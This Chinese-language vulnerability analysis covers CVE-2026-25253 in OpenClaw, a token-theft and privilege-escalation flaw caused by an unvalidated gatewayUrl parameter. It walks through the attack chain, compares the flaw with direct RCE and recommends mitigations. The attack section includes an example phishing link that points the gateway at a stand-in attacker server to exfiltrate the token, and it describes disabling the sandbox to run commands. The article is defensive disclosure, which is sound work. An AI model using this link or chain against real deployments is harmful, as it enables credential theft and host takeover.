2026 年初,OpenClaw(曾用名 clawdbot、Moltbot)再次成为安全研究社区的焦点。继此前披露的远程代码执行(RCE)漏洞之后,安全研究员又发现了另一类严重的安全缺陷 ——CVE-2026-25253,这是一个涉及令牌窃取与权限提升的复合型漏洞。与单纯的 RCE 漏洞不同,该漏洞利用了控制界面与网关之间的信任关系,通过钓鱼式攻击实现身份验证令牌的非法获取,最终导致攻击者可对目标网关实施完全控制。本文将深入剖析该漏洞的技术根因、完整攻击链路,并与传统 RCE 漏洞的防护策略进行对比,为安全运维人员提供可操作的缓解建议。
漏洞概述与影响范围
CVE-2026-25253 是一种复合型安全漏洞,核心问题在于 OpenClaw 的控制界面(Control UI)对用户提供的 gatewayUrl 参数缺乏有效验证,并且在页面加载时自动建立 WebSocket 连接,导致存储在本地的心跳令牌被发送至攻击者控制的服务器。该漏洞影响 OpenClaw 2026.1.28 及之前版本,在 2026.1.29 版本中得到修复。漏洞的危险等级被评定为高危,CVSS 3.1 评分为 8.8 分,属于可造成严重后果的网络安全事件。
从漏洞分类角度来看,该问题被归类为 CWE-669(不正确的主体间资源转移),这意味着应用程序未能正确控制信息在不同安全域之间的流动。具体而言,控制界面所在的前端域本不应向不受信任的第三方服务器发送身份验证令牌,但 OpenClaw 实现了自动连接机制,违反了这一安全原则。该漏洞的另一个重要特征是其攻击门槛相对较低 —— 攻击者只需诱导用户点击一个精心构造的链接,无需用户具备任何特殊权限,也无需事先获得有效的身份凭证。这意味着即使目标系统配置为仅监听本地回环地址,攻击仍然可行,因为受害者的浏览器会作为攻击的跳板主动发起出站连接。
技术根因分析
深入分析该漏洞的技术根因,可以发现问题的根源在于两个相互关联的设计缺陷。第一,OpenClaw 控制界面直接信任并使用来自 URL 查询字符串的 gatewayUrl 参数,未对该参数的来源域名、协议或格式进行任何验证。在正常的系统设计中,类似这种影响安全决策的用户输入必须经过严格的白名单校验,确保其指向受信任的目标服务器。第二,系统在页面加载时自动建立 WebSocket 连接,而没有向用户呈现确认对话框或提供任何交互式批准流程。这种 “静默连接” 行为使得恶意链接能够在用户不知情的情况下触发令牌传输。
从代码层面来看,OpenClaw 在处理 gatewayUrl 参数时缺少标准的输入验证逻辑。正常的安全实践要求对任何来自 URL 的参数进行严格的正则匹配或域名白名单检查,只有符合预定义模式的地址才能被用于建立连接。此外,系统还应该在建立敏感连接前要求用户明确确认目标地址的可信性,尤其是在涉及身份验证令牌的场景中。这些安全设计的缺失为攻击者提供了可乘之机,使其能够通过社会工程手段诱导受害者泄露敏感的认证凭证。
攻击链路详解
理解该漏洞的攻击链路是制定有效防御策略的前提。整个攻击过程可以分解为五个关键步骤,每个步骤都利用了 OpenClaw 系统的特定安全缺陷。
攻击链的第一阶段是构造恶意链接。攻击者精心设计一个包含恶意 gatewayUrl 参数的 URL,该参数指向攻击者控制的服务器。例如,链接可能形如 https://victim-host:8080/?gatewayUrl=wss://attacker-controlled-server.com/exfiltrate。当受害者访问此链接时,OpenClaw 控制界面会解析 URL 参数并获取攻击者指定的网关地址。由于缺乏验证,系统会直接接受这个不受信任的地址。
第二阶段发生在页面加载时。OpenClaw 控制界面在初始化过程中会自动尝试建立 WebSocket 连接,连接到 URL 参数中指定的 gatewayUrl。在这个恶意场景中,连接目标实际上是攻击者控制的服务器,而非合法的本地网关。关键的细节是,系统在建立连接时会在载荷中包含存储在本地的心跳令牌,用于向网关证明操作者身份。这个令牌本应只在受信任的网关通信中使用,但由于自动连接机制,令牌被发送到了攻击者手中。
第三阶段是令牌窃取。攻击者的服务器接收到受害者的 WebSocket 连接后,可以记录连接请求中携带的令牌信息。由于 WebSocket 握手过程中包含了身份验证载荷,攻击者无需任何破解操作即可获得有效的认证令牌。这个令牌的窃取过程对受害者完全透明,用户可能只是点击了一个链接,毫不知情地就将敏感的认证凭证发送给了攻击者。
获取令牌后,攻击者进入第四阶段 —— 网关控制。攻击者使用窃取的令牌向受害者的本地网关发起合法的 WebSocket 连接。由于令牌有效,网关会接受攻击者作为已认证的操作者,赋予其相应的 API 访问权限。在这个阶段,攻击者实际上已经绕过了正常的设备配对流程,获得了对网关的初始访问能力。
攻击的最后阶段是权限提升与代码执行。攻击者获得网关访问权限后,可以利用网关提供的工具调用功能修改配置策略,例如禁用沙箱限制或放宽工具策略,然后通过网关执行任意系统命令,实现完整的远程代码执行。这一步是整个攻击链的最终目标,使得攻击者能够完全控制运行 OpenClaw 的主机系统。值得注意的是,即使网关配置为仅监听 127.0.0.1(本地回环地址),攻击仍然有效,因为受害者的浏览器主动发起了出站连接,充当了攻击者的中间人。
与直接 RCE 漏洞的对比分析
将 CVE-2026-25253 与传统的直接 RCE(远程代码执行)漏洞进行对比,可以更清晰地理解两类漏洞在攻击方式、防护策略和检测难度上的差异。这种对比对于安全团队制定全面的防御策略具有重要参考价值。
从攻击入口来看,直接 RCE 漏洞通常利用应用程序的输入处理缺陷,例如 SQL 注入、命令注入或反序列化漏洞,直接在目标系统上执行攻击者构造的恶意代码。这类漏洞的触发往往不需要任何用户交互,攻击者可以通过网络请求直接触发。而 CVE-2026-25253 属于典型的钓鱼式漏洞,需要诱导用户点击恶意链接,利用用户的浏览器作为攻击跳板。从攻击复杂度来看,直接 RCE 的技术门槛通常较高,需要深入理解目标应用程序的内部架构和漏洞机制;而令牌窃取类漏洞虽然也需要精心设计攻击链,但主要依赖社会工程手段,技术实现相对简单。
在漏洞修复难度方面,两类漏洞也存在显著差异。直接 RCE 漏洞通常需要开发团队深入分析代码逻辑,修复输入验证、访问控制或内存管理方面的根本性缺陷,修复周期较长且风险较高。CVE-2026-25253 的修复则相对直接 —— 在控制界面中添加 gatewayUrl 验证逻辑,并在建立新网关连接前要求用户确认 —— 这些改动可以在较短时间内完成且影响范围可控。OpenClaw 在 2026.1.29 版本中采用的正是这一策略,通过在连接前增加用户确认步骤,有效阻断了自动令牌外泄的攻击路径。
从检测与监控的角度看,直接 RCE 漏洞的检测通常依赖 Web 应用防火墙(WAF)、入侵检测系统(IDS)或运行时应用自保护(RASP)工具,这些工具能够识别异常的网络请求或代码执行行为。而 CVE-2026-25253 的检测重点在于监控 WebSocket 出站连接的目的地,特别是那些指向非预期域名的连接。此外,对设备配对状态和操作员权限分配的审计也有助于发现异常行为 —— 如果一个刚建立连接但尚未完成配对的设备立即请求提升权限,这很可能是攻击尝试的迹象。
缓解措施与最佳实践
针对 CVE-2026-25253 这类复合型漏洞,安全团队需要采取多层次的缓解策略。以下是经过验证的可操作建议,按照优先级和技术实现难度进行了分类整理。
首要的缓解措施是立即升级到安全版本。OpenClaw 已在 2026.1.29 版本中修复了该漏洞,所有受影响的部署实例都应尽快完成升级。版本升级是消除漏洞最直接有效的方式,能够从根本上消除攻击面。对于无法立即升级的生产环境,应评估业务影响并制定详细的升级计划,确保在合理时间窗口内完成补丁部署。
在技术控制层面,严格的 gatewayUrl 验证是必不可少的防护手段。建议实施以下验证规则:域名白名单机制,仅允许连接到预定义的受信任网关地址列表;协议强制检查,确保连接必须使用 WSS(WebSocket Secure)协议,防止明文通信导致的中间人攻击;URL 格式校验,使用标准化的 URL 解析库验证参数格式,拒绝任何异常格式的输入。这些验证逻辑应在客户端和服务器端同时实现,形成纵深防御。
用户交互层面的安全增强同样关键。即使对于来自白名单域名的连接,系统也应该在建立连接前展示确认对话框,清晰告知用户即将连接的网关地址,并要求明确的用户授权。这一设计原则不仅适用于 OpenClaw,也应该推广到所有涉及敏感凭证传输的应用程序中。安全设计的基本原则是,任何可能影响安全状态的决策都不应绕过用户的知情权。
监控与告警体系的完善也是防御策略的重要组成部分。建议部署以下监控能力:实时检测指向非白名单域名的 WebSocket 出站连接;对设备配对状态变更和权限提升请求进行审计和告警;记录所有网关配置变更操作,便于事后溯源分析;设置异常行为检测基线,例如识别短时间内大量令牌外泄的可疑模式。这些监控能力能够帮助安全团队在攻击成功前及时发现并阻断威胁。
对于无法立即修复的遗留系统,可以考虑以下临时缓解措施:在网络边界部署 SSL 解密和检查设备,监控 WebSocket 流量中的异常目的地;通过浏览器扩展或代理脚本在客户端强制实施 gatewayUrl 验证;定期轮换网关访问令牌,降低令牌泄露后的窗口期影响。需要强调的是,这些临时措施不能替代根本性的漏洞修复,仅应作为过渡期的风险降低手段。
总结
CVE-2026-25253 再次提醒我们,复杂的应用系统往往存在多层次的安全风险。与传统的直接代码执行漏洞相比,令牌窃取类漏洞利用了应用程序的信任传递机制,通过钓鱼式攻击实现权限提升,对用户的安全意识提出了更高要求。OpenClaw 事件的核心教训在于:任何影响安全决策的用户输入都必须经过严格验证,敏感操作的执行不应绕过用户的知情权和授权确认机制。对于安全团队而言,理解漏洞的技术根因、构建多层次的防御体系、建立持续的安全监控能力,是在日益复杂的威胁环境中保护组织资产的关键所在。
参考资料
- NIST NVD: CVE-2026-25253, https://nvd.nist.gov/vuln/detail/CVE-2026-25253
- GitHub Security Advisory: GHSA-g8p2-7wf7-98mq, https://github.com/openclaw/openclaw/security/advisories/GHSA-g8p2-7wf7-98mq